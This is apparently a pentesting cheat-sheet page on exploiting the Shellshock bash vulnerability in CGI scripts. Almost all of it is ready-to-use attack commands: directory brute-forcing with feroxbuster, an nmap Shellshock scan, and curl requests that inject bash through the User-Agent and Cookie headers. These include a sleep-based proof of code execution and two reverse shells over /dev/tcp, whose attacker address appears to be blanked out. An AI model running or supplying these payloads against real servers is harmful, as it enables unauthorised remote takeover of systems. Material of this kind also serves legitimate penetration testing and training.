Skip to content


feroxbuster -u http://$IP/cgi-bin/ -x sh,cgi,pl


(step 1) - Testing for shellshock Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.

nmap $IP -p 80 --script=http-shellshock --script-args uri=/cgi-bin/test.cgi
(step 2) - PoC that we have RCE (you could also make a ping or web request to yourself and monitor that oth tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://$IP/cgi-bin/test.cgi
(step 3) - Reverse shell
curl -k -H 'User-Agent: () { :; }; /bin/bash -c "exec bash -i &>/dev/tcp/ <&1"' http://$IP/cgi-bin/test.cgi



curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' 2>/dev/null| grep 'VULNERABLE'
Out-Of-Band Use Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/ 0>&1' http://$IP/cgi-bin/